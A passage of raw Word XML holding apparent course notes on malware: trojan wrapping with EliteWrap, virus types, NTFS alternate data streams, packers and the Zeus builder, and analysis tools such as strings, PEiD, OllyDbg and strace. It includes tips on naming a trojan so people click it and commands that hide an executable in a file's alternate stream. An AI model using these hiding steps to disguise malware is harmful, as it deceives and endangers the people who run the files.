        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Give it a name that people are going to want to click on. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>EliteWrap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - takes an exe malware and wraps it inside something different. Creates a Trojan </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>horse</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00D12C69" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve">rap bot.exe inside install.exe. When you click on the exe it will run the thing that's expected but in the background the malware will run. </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8" w:rsidRPr="00D12C69">
        <w:t>Sneaky</w:t>
      </w:r>
      <w:r w:rsidR="003B567C" w:rsidRPr="00D12C69">
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Virus Types</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Boot Sector</w:t>
      </w:r>
      <w:r w:rsidR="00D12C69">
        <w:t xml:space="preserve"> - works by replacing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the boot record on your system with a piece of code and will execute a virus prior to launching your existing boot record.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Shell virus</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - wraps a shell around a typical exe. </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>Wrap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Notepad inside a shell that will launch a virus before starting notepad. Have to compare the hash of the program to AV to see if there is a virus in the code. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Multi-partite</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - is a hybrid of both types wrapped int</w:t>
      </w:r>
      <w:r w:rsidR="00823EE2">
        <w:t>o one. Can include macros from MS O</w:t>
      </w:r>
      <w:r>
        <w:t>ffice (visual basics)</w:t>
      </w:r>
      <w:r w:rsidR="00823EE2">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Poly-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>morphic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - Does code mutations. "Zeus". When you create the malware in the app it has a different hash </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>every time</w:t>
      </w:r>
      <w:r>
        <w:t>. This makes it hard to match to an AV signature.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00754FF8" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Meta-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>morphic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> - Re-writes itself eve</w:t>
      </w:r>
      <w:r>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t>time it infects a new file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Malware Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>http://www.virustotal.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Upload a file to the website and it will scan it and see if it matches any of their signatures they have saved. Gives a detailed description of what the file is.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRPr="00823EE2" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00823EE2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Strings- using search strings.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00823EE2">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>strings</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00823EE2">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> zsb.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00823EE2">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00823EE2">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>-- searches for strings of ASCII characters in any exe files</w:t>
      </w:r>
      <w:r w:rsidR="00823EE2">
        <w:t xml:space="preserve"> in Linux</w:t>
      </w:r>
      <w:r>
        <w:t>. Possibly find some human readable information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00823EE2">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>peID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00823EE2">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00823EE2">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00823EE2">
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>- program executable ID. Search through exe files to see if it has been wrapped. Lots</w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>of good information if you know what you're doing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Windows ADS - Alternate Data Stream</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>1 single stream for that one text file.</w:t>
      </w:r>
      <w:r w:rsidR="00823EE2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>Multiple</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> streams per file.</w:t>
      </w:r>
      <w:r w:rsidR="009606AB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ADS is </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>something</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in Windows that supports the use of Apple Resource Forks. There is also something in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MacOS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> that allows applications connectivity back to Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>ADS is something that has always been there in Windows, wasn't until recently that attackers realised it could be exploited. Stuff their malware into these data streams to hide them.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00823EE2">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>echo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00823EE2">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> just a bunch of garbage &gt; garbage.txt</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>-- Creates a text file called garbage containing the typed words.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00823EE2">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00823EE2">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> garbage.txt</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00823EE2">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>-- types what's in garbage.txt onto the command line.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00823EE2">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00823EE2">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> streams.exe &gt; garbage.txt:streams.exe</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>-- connects streams.exe as an ads to the text file garbage.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D590F" w:rsidRDefault="005D590F" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F46A33">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>notepad</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F46A33">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> garbage.txt</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- still shows contents of garbage.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F46A33" w:rsidRPr="00F46A33" w:rsidRDefault="00F46A33" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F46A33">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>mklink</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F46A33">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> systemlink.exe garbage.txt:streams.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00754FF8" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>When</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> you do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003B567C" w:rsidRPr="00640DDF">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003B567C" w:rsidRPr="00640DDF">
        <w:t xml:space="preserve"> garbage.txt</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> only shows the file size of the primary data stream, the </w:t>
      </w:r>
      <w:r w:rsidR="00823EE2">
        <w:t>ADS</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> isn't shown, it is hidden.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Windows 7 prevents opening applications from inside an alternate data stream</w:t>
      </w:r>
      <w:r w:rsidR="00823EE2">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00823EE2" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Doesn’t</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> show up in Windows Explorer either. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Debugging</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Need to be familiar with how </w:t>
      </w:r>
      <w:r w:rsidR="00823EE2">
        <w:t xml:space="preserve">programs or applications </w:t>
      </w:r>
      <w:r>
        <w:t>work and how they're laid out if you're going to be working with malware.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRPr="00823EE2" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00823EE2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Windows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OllyDbg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - free debugger</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Immunity Debugger - similar but it's in colour. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00754FF8" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Translates</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> the binary to an almost readable format.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>EST - is the stack pointer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Base pointer is the bottom of the stack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Instruction Pointer is where we are in the stack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRPr="00823EE2" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00823EE2">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Might have to watch a tutorial on this to get a better understanding.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRPr="00823EE2" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00823EE2">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00754FF8" w:rsidRPr="00823EE2">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>When</w:t>
      </w:r>
      <w:r w:rsidRPr="00823EE2">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> you know the code language better...."  WHAT?!!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Run through instruction by instruction of how a program runs and what's happening with its memory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Packing &amp; Packers in relation to Malware</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00823EE2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Free UPX</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">" download takes files that have a </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>Microsoft</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> portable execu</w:t>
      </w:r>
      <w:r w:rsidR="00823EE2">
        <w:t>table and do compression on them</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and wrap the ap</w:t>
      </w:r>
      <w:r w:rsidR="00823EE2">
        <w:t xml:space="preserve">plication and executable code. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Kind of forces a compression on a file. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00823EE2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Zeus</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (again) - automated builder. This </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>will create</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> your </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>Trojan</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> horse with the executable hidden inside. Zeus has UPX built in to the application. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Program Analysis continued</w:t>
      </w:r>
      <w:r w:rsidR="00823EE2">
        <w:t>…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRPr="00823EE2" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00823EE2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00823EE2">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>strace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00823EE2">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> ./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00823EE2">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>formatstr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">-- system calls. </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>Static</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> analysis with a little dynamic of what goes on when you run a program. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00823EE2">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>ltrace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00823EE2">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> ./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00823EE2">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>formatstr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:tab/>
        <w:t>-- library calls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRPr="00823EE2" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00823EE2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00823EE2">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Process Explorer</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">-- nice GUI information about all processes and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ProcessID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. How much memory is in </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>use?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>Click</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> through properties, very useful information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00823EE2">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Not even sure if this is still a thing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00823EE2">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Process Monitor</w:t>
      </w:r>
      <w:r w:rsidR="00823EE2">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-- a little bit like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>strace</w:t>
      </w:r>
